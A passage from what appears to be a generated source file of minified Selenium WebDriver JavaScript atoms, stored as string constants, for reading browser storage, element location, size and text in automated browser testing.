"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function e(){}e.prototype=a.prototype;f.b="\
"a.prototype;f.prototype=new e})();\nvar h=\"unknown error\",g={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};g[13]=h;g[9]=\"unknown "\
"command\";f.prototype.toString=function(){return this.name+\": \"+this."\
"message};var k=this.navigator;var l=-1!=(k&&k.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=d||d;switch(\"local_storage\"){case "\
"\"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return l?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new f(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.size=function(){retu"\
"rn this.a.length};n.prototype.key=function(a){return this.a.key(a)};fun"\
"ction p(){var a;if(!m())throw new f(13,\"Local storage undefined\");a=n"\
"ew n(d.localStorage);for(var e=[],b=a.size(),c=0;c<b;c++)e[c]=a.a.key(c"\
");return e}var q=[\"_\"],r=this;q[0]in r||!r.execScript||r.execScript("\
"\"var \"+q[0]);for(var s;q.length&&(s=q.shift());)q.length||void 0===p?"\
"r=r[s]?r[s]:r[s]={}:r[s]=p;; return this._.apply(null,arguments);}.appl"\
"y({navigator:typeof window!=undefined?window.navigator:null,document:ty"\
"peof window!=undefined?window.document:null}, arguments);}"
GET_LOCAL_STORAGE_SIZE = \
"function(){return function(){var c=window;function d(a,g){this.code=a;t"\
"his.state=e[a]||f;this.message=g||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function g(){}g.prototype=a.prototype;d.b="\
"a.prototype;d.prototype=new g})();\nvar f=\"unknown error\",e={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};e[13]=f;e[9]=\"unknown "\
"command\";d.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"local_storage\"){case "\
"\"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new d(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.size=function(){retu"\
"rn this.a.length};function p(){if(!m())throw new d(13,\"Local storage u"\
"ndefined\");return(new n(c.localStorage)).size()}var q=[\"_\"],r=this;q"\
"[0]in r||!r.execScript||r.execScript(\"var \"+q[0]);for(var s;q.length&"\
"&(s=q.shift());)q.length||void 0===p?r=r[s]?r[s]:r[s]={}:r[s]=p;; retur"\
"n this._.apply(null,arguments);}.apply({navigator:typeof window!=undefi"\
"ned?window.navigator:null,document:typeof window!=undefined?window.docu"\
"ment:null}, arguments);}"
GET_SESSION_STORAGE_ITEM = \
"function(){return function(){var c=window;function e(a,d){this.code=a;t"\
"his.state=f[a]||g;this.message=d||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function d(){}d.prototype=a.prototype;e.b="\
"a.prototype;e.prototype=new d})();\nvar g=\"unknown error\",f={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};f[13]=g;f[9]=\"unknown "\
"command\";e.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"session_storage\"){case"\
" \"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new e(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.getItem=function(a){return this.a.getItem(a)};n.prototype.clear=f"\
"unction(){this.a.clear()};function p(a){var d;if(m())d=new n(c.sessionS"\
"torage);else throw new e(13,\"Session storage undefined\");return d.get"\
"Item(a)}var q=[\"_\"],r=this;q[0]in r||!r.execScript||r.execScript(\"va"\
"r \"+q[0]);for(var s;q.length&&(s=q.shift());)q.length||void 0===p?r=r["\
"s]?r[s]:r[s]={}:r[s]=p;; return this._.apply(null,arguments);}.apply({n"\
"avigator:typeof window!=undefined?window.navigator:null,document:typeof"\
" window!=undefined?window.document:null}, arguments);}"
GET_SESSION_STORAGE_KEY = \
"function(){return function(){var c=window;function e(a,d){this.code=a;t"\
"his.state=f[a]||g;this.message=d||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function d(){}d.prototype=a.prototype;e.b="\
"a.prototype;e.prototype=new d})();\nvar g=\"unknown error\",f={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};f[13]=g;f[9]=\"unknown "\
"command\";e.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"session_storage\"){case"\
" \"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new e(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.key=function(a){retu"\
"rn this.a.key(a)};function p(a){var d;if(m())d=new n(c.sessionStorage);"\
"else throw new e(13,\"Session storage undefined\");return d.key(a)}var "\
"q=[\"_\"],r=this;q[0]in r||!r.execScript||r.execScript(\"var \"+q[0]);f"\
"or(var s;q.length&&(s=q.shift());)q.length||void 0===p?r=r[s]?r[s]:r[s]"\
"={}:r[s]=p;; return this._.apply(null,arguments);}.apply({navigator:typ"\
"eof window!=undefined?window.navigator:null,document:typeof window!=und"\
"efined?window.document:null}, arguments);}"
GET_SESSION_STORAGE_KEYS = \
"function(){return function(){var d=window;function f(a,e){this.code=a;t"\
"his.state=g[a]||h;this.message=e||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),c=b.length-5;if(0>c||b.indexOf(\"Error\",c)!=c)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function e(){}e.prototype=a.prototype;f.b="\
"a.prototype;f.prototype=new e})();\nvar h=\"unknown error\",g={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};g[13]=h;g[9]=\"unknown "\
"command\";f.prototype.toString=function(){return this.name+\": \"+this."\
"message};var k=this.navigator;var l=-1!=(k&&k.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=d||d;switch(\"session_storage\"){case"\
" \"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return l?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new f(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.size=function(){retu"\
"rn this.a.length};n.prototype.key=function(a){return this.a.key(a)};fun"\
"ction p(){var a;if(m())a=new n(d.sessionStorage);else throw new f(13,\""\
"Session storage undefined\");for(var e=[],b=a.size(),c=0;c<b;c++)e[c]=a"\
".a.key(c);return e}var q=[\"_\"],r=this;q[0]in r||!r.execScript||r.exec"\
"Script(\"var \"+q[0]);for(var s;q.length&&(s=q.shift());)q.length||void"\
" 0===p?r=r[s]?r[s]:r[s]={}:r[s]=p;; return this._.apply(null,arguments)"\
";}.apply({navigator:typeof window!=undefined?window.navigator:null,docu"\
"ment:typeof window!=undefined?window.document:null}, arguments);}"
GET_SESSION_STORAGE_SIZE = \
"function(){return function(){var c=window;function d(a,g){this.code=a;t"\
"his.state=e[a]||f;this.message=g||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function g(){}g.prototype=a.prototype;d.b="\
"a.prototype;d.prototype=new g})();\nvar f=\"unknown error\",e={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};e[13]=f;e[9]=\"unknown "\
"command\";d.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"session_storage\"){case"\
" \"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new d(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.size=function(){retu"\
"rn this.a.length};function p(){var a;if(m())a=new n(c.sessionStorage);e"\
"lse throw new d(13,\"Session storage undefined\");return a.size()}var q"\
"=[\"_\"],r=this;q[0]in r||!r.execScript||r.execScript(\"var \"+q[0]);fo"\
"r(var s;q.length&&(s=q.shift());)q.length||void 0===p?r=r[s]?r[s]:r[s]="\
"{}:r[s]=p;; return this._.apply(null,arguments);}.apply({navigator:type"\
"of window!=undefined?window.navigator:null,document:typeof window!=unde"\
"fined?window.document:null}, arguments);}"
GET_LOCATION = \
"function(){return function(){var g=this;var h;function k(a,b){this.x=vo"\
"id 0!==a?a:0;this.y=void 0!==b?b:0}k.prototype.toString=function(){retu"\
"rn\"(\"+this.x+\", \"+this.y+\")\"};function l(a){return 9==a.nodeType?"\
"a:a.ownerDocument||a.document}function m(a){this.a=a||g.document||docum"\
"ent};function n(a){var b;a:{b=l(a);if(b.defaultView&&b.defaultView.getC"\
"omputedStyle&&(b=b.defaultView.getComputedStyle(a,null))){b=b.position|"\
"|b.getPropertyValue(\"position\")||\"\";break a}b=\"\"}return b||(a.cur"\
"rentStyle?a.currentStyle.position:null)||a.style&&a.style.position}\nfu"\
"nction p(a){var b=l(a),f=n(a),c=\"fixed\"==f||\"absolute\"==f;for(a=a.p"\
"arentNode;a&&a!=b;a=a.parentNode)if(f=n(a),c=c&&\"static\"==f&&a!=b.doc"\
"umentElement&&a!=b.body,!c&&(a.scrollWidth>a.clientWidth||a.scrollHeigh"\
"t>a.clientHeight||\"fixed\"==f||\"absolute\"==f||\"relative\"==f))retur"\
"n a;return null};function q(a){var b=l(a),f=n(a),c=new k(0,0),e=(b?l(b)"\
":document).documentElement;if(a==e)return c;if(a.getBoundingClientRect)"\
"{a:{var d;try{d=a.getBoundingClientRect()}catch(u){a={left:0,top:0,righ"\
"t:0,bottom:0};break a}a=d}e=(b?new m(l(b)):h||(h=new m)).a;b=e.body;e=e"\
".parentWindow||e.defaultView;b=new k(e.pageXOffset||b.scrollLeft,e.page"\
"YOffset||b.scrollTop);c.x=a.left+b.x;c.y=a.top+b.y}else if(b.getBoxObje"\
"ctFor)a=b.getBoxObjectFor(a),b=b.getBoxObjectFor(e),c.x=a.screenX-b.scr"\
"eenX,c.y=a.screenY-b.screenY;\nelse{d=a;do{c.x+=d.offsetLeft;c.y+=d.off"\
"setTop;d!=a&&(c.x+=d.clientLeft||0,c.y+=d.clientTop||0);if(\"fixed\"==n"\
"(d)){c.x+=b.body.scrollLeft;c.y+=b.body.scrollTop;break}d=d.offsetParen"\
"t}while(d&&d!=a);\"absolute\"==f&&(c.y-=b.body.offsetTop);for(d=a;(d=p("\
"d))&&d!=b.body&&d!=e;)c.x-=d.scrollLeft,c.y-=d.scrollTop}return c}var r"\
"=[\"_\"],s=g;r[0]in s||!s.execScript||s.execScript(\"var \"+r[0]);for(v"\
"ar t;r.length&&(t=r.shift());)r.length||void 0===q?s=s[t]?s[t]:s[t]={}:"\
"s[t]=q;; return this._.apply(null,arguments);}.apply({navigator:typeof "\
"window!=undefined?window.navigator:null,document:typeof window!=undefin"\
"ed?window.document:null}, arguments);}"
GET_SIZE = \
"function(){return function(){function c(a,b){this.width=a;this.height=b"\
"}c.prototype.toString=function(){return\"(\"+this.width+\" x \"+this.he"\
"ight+\")\"};function d(a){var b=a.offsetWidth,f=a.offsetHeight;if((void"\
" 0===b||!b&&!f)&&a.getBoundingClientRect){a:{var g;try{g=a.getBoundingC"\
"lientRect()}catch(l){a={left:0,top:0,right:0,bottom:0};break a}a=g}retu"\
"rn new c(a.right-a.left,a.bottom-a.top)}return new c(b,f)};function e(a"\
"){var b;a:{b=9==a.nodeType?a:a.ownerDocument||a.document;if(b.defaultVi"\
"ew&&b.defaultView.getComputedStyle&&(b=b.defaultView.getComputedStyle(a"\
",null))){b=b.display||b.getPropertyValue(\"display\")||\"\";break a}b="\
"\"\"}if(\"none\"!=(b||(a.currentStyle?a.currentStyle.display:null)||a.s"\
"tyle&&a.style.display))return d(a);b=a.style;var f=b.display,g=b.visibi"\
"lity,l=b.position;b.visibility=\"hidden\";b.position=\"absolute\";b.dis"\
"play=\"inline\";a=d(a);b.display=f;b.position=l;b.visibility=g;return a"\
"}\nvar h=[\"_\"],k=this;h[0]in k||!k.execScript||k.execScript(\"var \"+"\
"h[0]);for(var m;h.length&&(m=h.shift());)h.length||void 0===e?k=k[m]?k["\
"m]:k[m]={}:k[m]=e;; return this._.apply(null,arguments);}.apply({naviga"\
"tor:typeof window!=undefined?window.navigator:null,document:typeof wind"\
"ow!=undefined?window.document:null}, arguments);}"
GET_TEXT = \
"function(){return function(){function f(a){return function(){return a}}"\
"var k=this;\nfunction l(a){var b=typeof a;if(\"object\"==b)if(a){if(a i"\
"nstanceof Array)return\"array\";if(a instanceof Object)return b;var c=O"\
"bject.prototype.toString.call(a);if(\"[object Window]\"==c)return\"obje"\
"ct\";if(\"[object Array]\"==c||\"number\"==typeof a.length&&\"undefined"\
"\"!=typeof a.splice&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a.p"\
"ropertyIsEnumerable(\"splice\"))return\"array\";if(\"[object Function]"\
"\"==c||\"undefined\"!=typeof a.call&&\"undefined\"!=typeof a.propertyIs"\
"Enumerable&&!a.propertyIsEnumerable(\"call\"))return\"function\"}else r"\
"eturn\"null\";\nelse if(\"function\"==b&&\"undefined\"==typeof a.call)r"\
"eturn\"object\";return b}function m(a){return\"string\"==typeof a};func"\
"tion aa(a){var b=a.length-1;return 0<=b&&a.indexOf(\" \",b)==b}function"\
" ba(a){return String(a).replace(/\\-([a-z])/g,function(a,c){return c.to"\
"UpperCase()})};var ca=Array.prototype;function p(a,b){for(var c=a.lengt"\
"h,d=m(a)?a.split(\"\"):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}fu"\
"nction da(a,b){if(a.reduce)return a.reduce(b,\"\");var c=\"\";p(a,funct"\
"ion(d,e){c=b.call(void 0,c,d,e,a)});return c}function ea(a,b){for(var c"\
"=a.length,d=m(a)?a.split(\"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d"\
"[e],e,a))return!0;return!1}\nfunction q(a,b){var c;a:if(m(a))c=m(b)&&1="\
"=b.length?a.indexOf(b,0):-1;else{for(c=0;c<a.length;c++)if(c in a&&a[c]"\
"===b)break a;c=-1}return 0<=c}function fa(a,b,c){return 2>=arguments.le"\
"ngth?ca.slice.call(a,b):ca.slice.call(a,b,c)};var r={aliceblue:\"#f0f8f"\
"f\",antiquewhite:\"#faebd7\",aqua:\"#00ffff\",aquamarine:\"#7fffd4\",az"\
"ure:\"#f0ffff\",beige:\"#f5f5dc\",bisque:\"#ffe4c4\",black:\"#000000\","\
"blanchedalmond:\"#ffebcd\",blue:\"#0000ff\",blueviolet:\"#8a2be2\",brow"\
"n:\"#a52a2a\",burlywood:\"#deb887\",cadetblue:\"#5f9ea0\",chartreuse:\""\
"#7fff00\",chocolate:\"#d2691e\",coral:\"#ff7f50\",cornflowerblue:\"#649"\
"5ed\",cornsilk:\"#fff8dc\",crimson:\"#dc143c\",cyan:\"#00ffff\",darkblu"\
"e:\"#00008b\",darkcyan:\"#008b8b\",darkgoldenrod:\"#b8860b\",darkgray:"\
"\"#a9a9a9\",darkgreen:\"#006400\",\ndarkgrey:\"#a9a9a9\",darkkhaki:\"#b"\
"db76b\",darkmagenta:\"#8b008b\",darkolivegreen:\"#556b2f\",darkorange:"\
"\"#ff8c00\",darkorchid:\"#9932cc\",darkred:\"#8b0000\",darksalmon:\"#e9"\
"967a\",darkseagreen:\"#8fbc8f\",darkslateblue:\"#483d8b\",darkslategray"\
":\"#2f4f4f\",darkslategrey:\"#2f4f4f\",darkturquoise:\"#00ced1\",darkvi"\
"olet:\"#9400d3\",deeppink:\"#ff1493\",deepskyblue:\"#00bfff\",dimgray:"\
"\"#696969\",dimgrey:\"#696969\",dodgerblue:\"#1e90ff\",firebrick:\"#b22"\
"222\",floralwhite:\"#fffaf0\",forestgreen:\"#228b22\",fuchsia:\"#ff00ff"\
"\",gainsboro:\"#dcdcdc\",\nghostwhite:\"#f8f8ff\",gold:\"#ffd700\",gold"\
"enrod:\"#daa520\",gray:\"#808080\",green:\"#008000\",greenyellow:\"#adf"\
"f2f\",grey:\"#808080\",honeydew:\"#f0fff0\",hotpink:\"#ff69b4\",indianr"\
"ed:\"#cd5c5c\",indigo:\"#4b0082\",ivory:\"#fffff0\",khaki:\"#f0e68c\",l"\
"avender:\"#e6e6fa\",lavenderblush:\"#fff0f5\",lawngreen:\"#7cfc00\",lem"\
"onchiffon:\"#fffacd\",lightblue:\"#add8e6\",lightcoral:\"#f08080\",ligh"\
"tcyan:\"#e0ffff\",lightgoldenrodyellow:\"#fafad2\",lightgray:\"#d3d3d3"\
"\",lightgreen:\"#90ee90\",lightgrey:\"#d3d3d3\",lightpink:\"#ffb6c1\",l"\
"ightsalmon:\"#ffa07a\",\nlightseagreen:\"#20b2aa\",lightskyblue:\"#87ce"\
"fa\",lightslategray:\"#778899\",lightslategrey:\"#778899\",lightsteelbl"\
"ue:\"#b0c4de\",lightyellow:\"#ffffe0\",lime:\"#00ff00\",limegreen:\"#32"\
"cd32\",linen:\"#faf0e6\",magenta:\"#ff00ff\",maroon:\"#800000\",mediuma"\
"quamarine:\"#66cdaa\",mediumblue:\"#0000cd\",mediumorchid:\"#ba55d3\",m"\
"ediumpurple:\"#9370db\",mediumseagreen:\"#3cb371\",mediumslateblue:\"#7"\
"b68ee\",mediumspringgreen:\"#00fa9a\",mediumturquoise:\"#48d1cc\",mediu"\
"mvioletred:\"#c71585\",midnightblue:\"#191970\",mintcream:\"#f5fffa\",m"\
"istyrose:\"#ffe4e1\",\nmoccasin:\"#ffe4b5\",navajowhite:\"#ffdead\",nav"\
"y:\"#000080\",oldlace:\"#fdf5e6\",olive:\"#808000\",olivedrab:\"#6b8e23"\
"\",orange:\"#ffa500\",orangered:\"#ff4500\",orchid:\"#da70d6\",palegold"\
"enrod:\"#eee8aa\",palegreen:\"#98fb98\",paleturquoise:\"#afeeee\",palev"\
"ioletred:\"#db7093\",papayawhip:\"#ffefd5\",peachpuff:\"#ffdab9\",peru:"\
"\"#cd853f\",pink:\"#ffc0cb\",plum:\"#dda0dd\",powderblue:\"#b0e0e6\",pu"\
"rple:\"#800080\",red:\"#ff0000\",rosybrown:\"#bc8f8f\",royalblue:\"#416"\
"9e1\",saddlebrown:\"#8b4513\",salmon:\"#fa8072\",sandybrown:\"#f4a460\""\
",seagreen:\"#2e8b57\",\nseashell:\"#fff5ee\",sienna:\"#a0522d\",silver:"\
"\"#c0c0c0\",skyblue:\"#87ceeb\",slateblue:\"#6a5acd\",slategray:\"#7080"\
"90\",slategrey:\"#708090\",snow:\"#fffafa\",springgreen:\"#00ff7f\",ste"\
"elblue:\"#4682b4\",tan:\"#d2b48c\",teal:\"#008080\",thistle:\"#d8bfd8\""\
",tomato:\"#ff6347\",turquoise:\"#40e0d0\",violet:\"#ee82ee\",wheat:\"#f"\
"5deb3\",white:\"#ffffff\",whitesmoke:\"#f5f5f5\",yellow:\"#ffff00\",yel"\
"lowgreen:\"#9acd32\"};var ga=\"background-color border-top-color border"\
"-right-color border-bottom-color border-left-color color outline-color"\
"\".split(\" \"),ha=/#([0-9a-fA-F])([0-9a-fA-F])([0-9a-fA-F])/;function "\
"ia(a){if(!ja.test(a))throw Error(\"'\"+a+\"' is not a valid hex color\""\
");4==a.length&&(a=a.replace(ha,\"#$1$1$2$2$3$3\"));return a.toLowerCase"\
"()}var ja=/^#(?:[0-9a-f]{3}){1,2}$/i,ka=/^(?:rgba)?\\((\\d{1,3}),\\s?("\
"\\d{1,3}),\\s?(\\d{1,3}),\\s?(0|1|0\\.\\d*)\\)$/i;\nfunction la(a){var "\
"b=a.match(ka);if(b){a=Number(b[1]);var c=Number(b[2]),d=Number(b[3]),b="\
"Number(b[4]);if(0<=a&&255>=a&&0<=c&&255>=c&&0<=d&&255>=d&&0<=b&&1>=b)re"\
"turn[a,c,d,b]}return[]}var ma=/^(?:rgb)?\\((0|[1-9]\\d{0,2}),\\s?(0|[1-"\
"9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2})\\)$/i;function na(a){var b=a.match(ma"\
");if(b){a=Number(b[1]);var c=Number(b[2]),b=Number(b[3]);if(0<=a&&255>="\
"a&&0<=c&&255>=c&&0<=b&&255>=b)return[a,c,b]}return[]};function s(a,b){t"\
"his.code=a;this.state=oa[a]||pa;this.message=b||\"\";var c=this.state.r"\
"eplace(/((?:^|\\s+)[a-z])/g,function(a){return a.toUpperCase().replace("\
"/^[\\s\\xa0]+/g,\"\")}),d=c.length-5;if(0>d||c.indexOf(\"Error\",d)!=d)"\
"c+=\"Error\";this.name=c;c=Error(this.message);c.name=this.name;this.st"\
"ack=c.stack||\"\"}(function(){var a=Error;function b(){}b.prototype=a.p"\
"rototype;s.U=a.prototype;s.prototype=new b})();\nvar pa=\"unknown error"\
"\",oa={15:\"element not selectable\",11:\"element not visible\",31:\"im"\
"e engine activation failed\",30:\"ime not available\",24:\"invalid cook"\
"ie domain\",29:\"invalid element coordinates\",12:\"invalid element sta"\
"te\",32:\"invalid selector\",51:\"invalid selector\",52:\"invalid selec"\
"tor\",17:\"javascript error\",405:\"unsupported operation\",34:\"move t"\
"arget out of bounds\",27:\"no such alert\",7:\"no such element\",8:\"no"\
" such frame\",23:\"no such window\",28:\"script timeout\",33:\"session "\
"not created\",10:\"stale element reference\",\n0:\"success\",21:\"timeo"\
"ut\",25:\"unable to set cookie\",26:\"unexpected alert open\"};oa[13]=p"\
"a;oa[9]=\"unknown command\";s.prototype.toString=function(){return this"\
".name+\": \"+this.message};var t,v,w,qa=k.navigator;w=qa&&qa.platform||"\
"\"\";t=-1!=w.indexOf(\"Mac\");v=-1!=w.indexOf(\"Win\");var x=-1!=w.inde"\
"xOf(\"Linux\");var y;function z(a,b){this.x=void 0!==a?a:0;this.y=void "\
"0!==b?b:0}z.prototype.toString=function(){return\"(\"+this.x+\", \"+thi"\
"s.y+\")\"};z.prototype.ceil=function(){this.x=Math.ceil(this.x);this.y="\
"Math.ceil(this.y);return this};z.prototype.floor=function(){this.x=Math"\
".floor(this.x);this.y=Math.floor(this.y);return this};z.prototype.round"\
"=function(){this.x=Math.round(this.x);this.y=Math.round(this.y);return "\
"this};function B(a,b){this.width=a;this.height=b}B.prototype.toString=f"\
"unction(){return\"(\"+this.width+\" x \"+this.height+\")\"};B.prototype"\
".ceil=function(){this.width=Math.ceil(this.width);this.height=Math.ceil"\
"(this.height);return this};B.prototype.floor=function(){this.width=Math"\
".floor(this.width);this.height=Math.floor(this.height);return this};B.p"\
"rototype.round=function(){this.width=Math.round(this.width);this.height"\
"=Math.round(this.height);return this};var ra=3;function sa(a){for(;a&&1"\
"!=a.nodeType;)a=a.previousSibling;return a}function ta(a,b){if(a.contai"\
"ns&&1==b.nodeType)return a==b||a.contains(b);if(\"undefined\"!=typeof a"\
".compareDocumentPosition)return a==b||Boolean(a.compareDocumentPosition"\
"(b)&16);for(;b&&a!=b;)b=b.parentNode;return b==a}\nfunction ua(a,b){if("\
